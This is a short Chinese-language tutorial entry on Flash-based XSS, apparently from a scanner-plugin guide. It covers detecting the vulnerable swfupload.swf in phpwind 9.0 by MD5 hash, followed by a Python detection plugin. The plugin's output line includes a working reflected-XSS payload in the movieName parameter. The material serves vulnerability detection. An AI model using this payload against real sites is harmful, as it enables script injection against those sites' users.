Flash XSS

这一类的 XSS 主要是由于 Flash 与 Js 交互过程中产生的 XSS。

检测方法:校验 flash 的 hash 值(例如: md5)

实例:

phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf XSS漏洞

由于 Flash 文件是可以下载到客户端,所以直接下载该 swf 文件,校验其 hash。根据漏洞详情,可知该 swf 文件路径为: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf

范例插件

PHPWind 9.0 swfupload.swf Flash XSS

感谢插件作者: xyw55

  1. #!/usr/bin/env python
  2. # coding:utf-8
  3. # @Date    : 2015-06-28
  4. # @Author  : xyw55 (xyw5255@163.com)
  6. '''
  7. phpwind 9.0 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf xss漏洞 POC
  8. refer : http://wooyun.org/bugs/wooyun-2013-017731
  9. '''
  10. import md5
  13. def assign(service, arg):
  14.     if service == fingerprint.phpwind:
  15.         return True, arg
  17. def audit(arg):
  18.     flash_md5 = "3a1c6cc728dddc258091a601f28a9c12"
  19.     file_path = "/res/js/dev/util_libs/swfupload/Flash/swfupload.swf"
  20.     url = arg
  21.     verify_url = url + file_path
  23.     code, head, res, redirect_url, log = hackhttp.http(verify_url)
  24.     if code == 200:
  25.         md5_value = md5.new(res).hexdigest()
  26.         if md5_value in flash_md5:
  27.             # info 中不要传 log
  28.             security_info(url + ' phpwind Reflected XSS; plaload: /res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName="])}catch(e){alert(1)}//')
  31. if __name__ == '__main__':
  32.     from dummy import *
  33.     audit(assign(fingerprint.phpwind, 'http://www.example.com/')[1])